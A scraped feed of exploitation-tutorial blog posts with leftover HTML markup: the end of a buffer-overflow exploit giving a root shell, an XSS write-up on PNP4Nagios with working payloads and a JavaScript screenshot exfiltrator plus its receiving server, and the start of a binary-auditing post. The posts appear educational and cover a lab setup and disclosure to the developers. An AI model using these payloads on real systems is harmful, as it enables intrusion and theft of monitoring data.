class="s2"quot;/span span class="c1"# the address of our 0xff 0xe4/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"20/span span class="c1"# nop sled/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThe only changes here are, before we overwrite the return address we only send codeA/code's (532 of them, 528 for the local variables and 4 for the saved EBP), then we put our return address (the address of codejmp esp/code strong08048cd0/strong) and lastly we stick our a href="https://en.wikipedia.org/wiki/NOP_slide" target="_blank"NOP sled/a and shellcode (the NOP sled isn't actually needed though as we know ESP will point to the start of our code)./p pWe can now exploit the application, first run the app again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pNow launch the exploit and connect to our shell:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-exploit2.py /span span class="code-line"span class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"pwd/span/span span class="code-line"span class="go"/home/appuser/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 32/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rwxr-xr-x 1 appuser appuser 486 Jul 8 11:16 jesp/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 32 Jul 8 11:08 jesp.nasm/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 432 Jul 8 11:16 jesp.o/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="go"cat token/span/span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!! :-)/p h2Conclusion/h2 pWhile ASLR makes it more difficult to exploit a vulnerability, it doesn't make it impossible. You do, however, need to understand how the stack works more than if ASLR is disabled./p pAlso, if you need to use instructions from inside the application code, you aren't restricted to the normal instructions executed by the application at runtime. You can jump into the middle of an instruction to create an entirely new instruction to run./p pThis idea of using bits of instructions (or gadgets) is the beginning of a href="https://en.wikipedia.org/wiki/Return-oriented_programming" target="_blank"return-oriented programming ROP/a, which we will use more extensively later./p pHappy Hacking :-)/p
✇eXploit

XSS in PNP4Nagios

By: 0xe7
pYesterday a href="http://seclists.org/oss-sec/2014/q3/26" target="_blank"this/a was sent to the a href="http://oss-security.openwall.org/wiki/" target="_blank"OSS-Security mailing list/a. For some reason the subject caught my eye (strongCVE request: pnp4nagios - Two URL Cross-Site Scripting Vulnerabilities/strong)./p pNeedless to say, I didn't bother reading it, the investigation started immediately. This is a result of that investigation./p !-- more -- pI started by downloading and installing Nagios and PNP4Nagios onto a freshly installed Debian Wheezy VM./p pI'm not going to go into the actual installation, its easy enough and there is plenty of documentation that explains how to do it, all I will say is that you will need Nagios 3 (I couldn't get PNP4Nagios working with Nagios 4) and I installed the latest version of PNP4Nagios (which was 0.6.22 at the time of writing)./p pYou might have to leave Nagios a few minutes to collect some data, I didn't set up some any services, Nagios comes with some default services which should be fine for our purposes./p pAfter this and you have removed code/usr/local/pnp4nagios/share/install.php/code from the server, visit codehttp://[server]/pnp4nagios//code, put in the username and password; and you should see this:/p pimg src="/assets/images/web-hacking/pnp4nagios-start.png" width="750"/p h2Testing The App/h2 pFirst it makes sense to test this input we have (codehost/code) for the most basic types of XSS:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-first.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-second.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third.png" width="750"/p pAs you can see, there is some filtering going on here, although it does confuse me as to why HTML is allowed to be injected at all./p pThe filtering going on here looks like its replacing at least '/' (strongforward slash/strong) and ' ' (strongspace/strong) with '_' (strongunderscore/strong)./p pAnd looking at the source, the output is encoded:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third-source.png" width="750"/p pAfter clicking on a service and a timerange on the right, a few more inputs appear:/p pimg src="/assets/images/web-hacking/pnp4nagios-more.png" width="750"/p pFrom the previous tests it seems that the error page has reasonably good filtering, so let's try to avoid that and come back to it later if we have to./p pWe have 2 new inputs to test (codesrv/code and codeview/code), I test each of these by appending codelt;foobargt;/code to them./p pTesting codesrv/code this way brings me back to the error page but testing codeview/code the page loads fine:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first.png" width="750"/p pLooking at the source and searching for codefoobar/code, we can see that it is stored in a hidden input tag and there doesn't seem to be any filtering:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first-source.png" width="750"/p h2Exploiting The App/h2 pLets try the normal tests, while prepending code"gt;/code to break out of the input tag, and look at the source:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-script-source.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-view-img-source.png" width="750"/p pWe're very nearly there, it looks like codeonerror/code attribute is being removed (I tried a few others as well and they were all removed), let's try and fool the filter using the classic code/**//code method:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss.png" width="750"/p pSuccess!/p pThe full URL I typed here was codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;view=3%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3E/code/p pIn fact, what this application seems to be doing is adding hidden fields for any argument that you give it and doesn't do sufficient filtering on any of them, I send this url (codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;monkey=foobar/code) and this was the resulting source:/p pimg src="/assets/images/web-hacking/pnp4nagios-monkey.png" width="750"/p h2Finding Another XSS/h2 pLet's also have a look at the zoom function on these graphs, clicking the zoom button (the little magnifying glass icon) you get this window:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom.png" width="750"/p pI copied the full URL and pasted it into my normal browser window so that I can play with the URL./p pLooking at the source the first thing I notice is that some of these inputs are vulnerable to the same XSS, inside the codeimg/code tag near the bottom, it seems to be subjected to the same filtering so I assume that it is the same vulnerability, however the second thing I notice is inside the codescript/code tags, inside a function called coderedirect/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js.png" width="750"/p pAs you can see, it appears that 1 of our inputs (codesource/code) is put inside these script tags, let's test to see what type of filtering it is subjected to:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js-test.png" width="750"/p pApparently there is no filtering here!/p pNow all we have to do is figure out the correct prefix and suffix to allow us to run our javascript and still maintain valid syntax./p pWe are inside a function that we need to break out of if we want our code to run on load, we do this by prepending code;};/code to our payload./p pNext we need to start a new function to ensure the syntax is correct, we do this by appending codefunction r(){/code, so our payload end up like this code;};alert(1);function r(){/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss2.png" width="750"/p pNice! We have our second XSS! :-)/p pHere is the full URL I used: codehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;};alert%281%29;function%20r%28%29{amp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p h2Going Beyond Alert(1)/h2 pI decided to demonstrate what can be done with this vulnerability./p pI will use a javascript library called a href="http://html2canvas.hertzen.com/" target="_blank"html2canvas/a to create a screenshot of a Nagios page to get as much information as possible about the network that is being monitored by Nagios./p pThe page we will target is codehttp://dev/nagios/cgi-bin/status.cgi?host=all/code. This page lists all of the hosts and services, on a real monitoring server we could get some juicy information on this page./p pHere is the javascript that I wrote for this purpose:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/spanspan class="o"=/spanspan class="nb"document/spanspan class="p";/spanspan class="kd"function/span span class="nx"r/spanspan class="p"(){/spanspan class="nx"n/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"()/span/span span class="code-line"span class="p";};};/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="mf"3/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"r/spanspan class="p"();};/spanspan class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/spanspan class="nx"f/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"style/spanspan class="o"=/spanspan class="s1"#39;border: 0; position:fixed;/span/span span class="code-line"span class="s1" top:0; left:0; right:0;bottom:0; width:100%; height:100%#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/spanspan class="o"=/spanspan class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/spanspan class="o"=/spanspan class="s1"#39;e#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"onload/spanspan class="o"=/spanspan class="kd"function/span span class="p"(){/spanspan class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]/span/span span class="code-line"span class="p"./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",{/spanspan class="nx"onrendered/spanspan class="o":/span span class="kd"function/spanspan class="p"(/spanspan class="nx"canvas/spanspan class="p")/span/span span class="code-line"span class="p"{/spanspan class="nx"q/spanspan class="o"=/spanspan class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/spanspan class="s1"#39;http://localhost:9000/?image=#39;/span/span span class="code-line"span class="o"+/spanspan class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/spanspan class="kc"true/spanspan class="p");/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");}});};/spanspan class="nx"s/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pI originally had it all on 1 line but I put it on seperate lines here for readability (this will work as is, you will just need to join lines 3 and 4)./p pThis javascript works perfectly for both of the XSS vulnerabilities we have found, just replace codealert(1)/code with a a href="http://www.w3schools.com/tags/ref_urlencode.asp" target="_blank"URL encoded/a version of the code above. a href="http://meyerweb.com/eric/tools/dencoder/" target="_blank"This/a site will encode it for you./p pI tried to make the payload reasonably small, you generally want to make an exploit payload as small as possible to raise as little suspicion as possible. I could probably have shrunk it more, especially as the site is using jquery but I'll leave that to someone else./p pLet's analyse this code a little and see what it is doing./p pFirstly it implements a function where it iterates through every element in the body of the page and removes it. Now we have a blank body to build on top of./p pNext it runs codewindow.stop();/code, this stops the main page from refreshing every 90 seconds./p pIt then creates an codeiframe/code which fills the page and has the src attribute set to code/nagios/cgi-bin/status.cgi?host=all/code./p pThe codeonload/code event of the iframe is then hooked, inside this function it uses html2canvas using the HTML content of the iframe and hooks the codeonrendered/code event./p pOnce html2canvas has rendered the page it sends a GET request to codehttp://localhost:9000/?image=/code with the base64 encoded output of html2canvas appended (this could be a link to any server under the attackers control)./p pLastly it creates a script tag with codehttp://html2canvas.hertzen.com/build/html2canvas.js/code (the html2canvas library) as the src attribute and appends the script tag and iframe to the body of the page./p pWhen run through a a href="http://jsbeautifier.org/" target="_blank"beautifier/a, the code looks like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/span span class="o"=/span span class="nb"document/spanspan class="p";/span/span span class="code-line"/span span class="code-line"span class="kd"function/span span class="nx"r/spanspan class="p"()/span span class="p"{/span/span span class="code-line" span class="nx"n/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/span/span span class="code-line" span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"();/span/span span class="code-line" span class="p"};/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="mf"3/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"r/spanspan class="p"();/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/span/span span class="code-line"span class="nx"f/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"style/span span class="o"=/span span class="s1"#39;border: 0; position:fixed; top:0; left:0; right:0;bottom:0; width:100%; height:100%#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/span span class="o"=/span span class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/span span class="o"=/span span class="s1"#39;e#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"onload/span span class="o"=/span span class="kd"function/span span class="p"()/span span class="p"{/span/span span class="code-line" span class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",/span span class="p"{/span/span span class="code-line" span class="nx"onrendered/spanspan class="o":/span span class="kd"function/span span class="p"(/spanspan class="nx"canvas/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"q/span span class="o"=/span span class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/span span class="s1"#39;http://localhost:9000/?image=#39;/span span class="o"+/span span class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/span span class="kc"true/spanspan class="p");/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");/span/span span class="code-line" span class="p"}/span/span span class="code-line" span class="p"});/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="nx"s/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pWe're nearly there. To automate the receiving of the image, I've written a python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"SocketServer/spanspan class="o",/span span class="nn"base64/span/span span class="code-line"/span span class="code-line"span class="k"class/span span class="nc"H2CHandler/spanspan class="p"(/spanspan class="n"SocketServer/spanspan class="o"./spanspan class="n"BaseRequestHandler/spanspan class="p"):/span/span span class="code-line" span class="k"def/span span class="nf"handle/spanspan class="p"(/spanspan class="bp"self/spanspan class="p"):/span/span span class="code-line" span class="n"fulldata/span span class="o"=/span span class="s1"#39;#39;/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="s1"#39;dummy#39;/span/span span class="code-line" span class="k"while/span span class="nb"len/spanspan class="p"(/spanspan class="n"data/spanspan class="p"):/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="bp"self/spanspan class="o"./spanspan class="n"request/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"4096/spanspan class="p")/span/span span class="code-line" span class="n"fulldata/span span class="o"+=/span span class="n"data/span/span span class="code-line" span class="k"if/span span class="n"fulldata/spanspan class="o"./spanspan class="n"find/spanspan class="p"(/spanspan class="s1"#39;Host:#39;/spanspan class="p")/span span class="o"!=/span span class="o"-/spanspan class="mi"1/spanspan class="p":/span/span span class="code-line" span class="k"break/span/span span class="code-line" span class="nb"print/span span class="s1"#39;got image#39;/span/span span class="code-line" span class="n"img/span span class="o"=/span span class="n"fulldata/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39;base64,#39;/spanspan class="p")[/spanspan class="mi"1/spanspan class="p"]/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39; #39;/spanspan class="p")[/spanspan class="mi"0/spanspan class="p"]/span/span span class="code-line"/span span class="code-line" span class="n"fd/span span class="o"=/span span class="nb"open/spanspan class="p"(/spanspan class="s2"quot;/tmp/imgs/test.pngquot;/spanspan class="p",/span span class="s2"quot;wquot;/spanspan class="p")/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"write/spanspan class="p"(/spanspan class="n"base64/spanspan class="o"./spanspan class="n"b64decode/spanspan class="p"(/spanspan class="n"img/spanspan class="p"))/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line"span class="n"serverAddr/span span class="o"=/span span class="p"(/spanspan class="s2"quot;0.0.0.0quot;/spanspan class="p",/span span class="mi"9000/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/span span class="o"=/span span class="n"SocketServer/spanspan class="o"./spanspan class="n"TCPServer/spanspan class="p"(/spanspan class="n"serverAddr/spanspan class="p",/span span class="n"H2CHandler/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/spanspan class="o"./spanspan class="n"serve_forever/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThis script could be improved but it will serve our purpose right now./p pIf you run our payload while this server is running an image like the following should be created in code/tmp/imgs/test.png/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-html2canvas.png" width="750"/p h2Conclusion/h2 pNo user input should be trusted in any situation. All input should be properly sanitized and in regards to websites, if HTML is not needed (as in this case), it should not be allowed./p pIn both of these cases, only numerical inputs should be allowed and everything else should be dropped./p pHappy Hacking :-)/p pstrongEDIT (2014-07-16):/strong/p pOn the day I posted this (2014-07-04) I informed the developers incase I had found new vulnerabilities that they didn't already know about and wasn't mention in the post to the OSS-Security mailing list./p pA bit of back and fourth went on (I installed their latest version from github) until it was clear that 2 of the 3 vulnerabilities I found were actually new:/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;%7D;alert%281%29;function%20r%28%29%7Bamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3Eamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pThe second one here I dismissed in my post as probably the same as the previous 1 I had found but in fact it wasn't, the first 1 I found in the post above was already fixed./p pSo the developers went away and fixed these 2 vulnerabilities on 2014-07-09, a href="https://github.com/lingej/pnp4nagios/commit/10000112eb87f23d136a121a8d49c6dcc3b1e82e" target="_blank"here/a are the commits./p pSo I had another look and about an hour later I found another:/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=_%22%3E%3Cimg%20src=B%20/**/onerror=%22alert%281%29%22%3E_amp;view=1amp;source=0amp;end=1404916359amp;start=1404826359/code/p pAgain I informed the developer and it was fixed on 2014-07-12, a href="https://github.com/lingej/pnp4nagios/commit/25de355097b3cf5d82ed3b63d68faadad7084e15" target="_blank"here/a are the commits./p
✇eXploit

Basic Binary Auditing

By: 0xe7
pBefore I go into some of the protections that are commonly in place, I thought it would be best to show how to detect these 2 basic vulnerabilities using a href="https://en.wikipedia.org/wiki/Reverse_engineering" target="_blank"reverse engineering/a (as opposed to randomly a href="https://en.wikipedia.org/wiki/Fuzz_testing" target="_blank"fuzzing/a inputs as we did in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a and a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a)./p pReverse engineering (reversing) is an extremely powerful tool in the hackers arsenal and when there is no source code for the application that you are targeting nothing is better./p !-- more -- pa href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"Assembly/a is the language of reversing and a a href="https://en.wikipedia.org/wiki/Debugger" target="_blank"debugger/a is the most important tool./p pAssembly is essentially the language of the processor, the actual "machine code" that people think of what the computer deals with (whether viewed as binary or hex) is just a different representation of assembly language, so this is the lowest level programming language possible to those outside of processor firmware development./p pA debugger is an application that allows you to view an applications a href="https://en.wikipedia.org/wiki/Virtual_memory" target="_blank"virtual memory segment/a as the application itself views it, as well as change the values in sections of memory or a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a at run time./p pAnother important feature of a debugger is the ability to set a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoints/a so you can force the application to stop execution at a specific part of the application and view values or a href="https://en.wikipedia.org/wiki/Stepping_%28debugging%29" target="_blank"step through/a the application instruction by instruction./p h2The App/h2 pWe will use the same basic application we used in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span 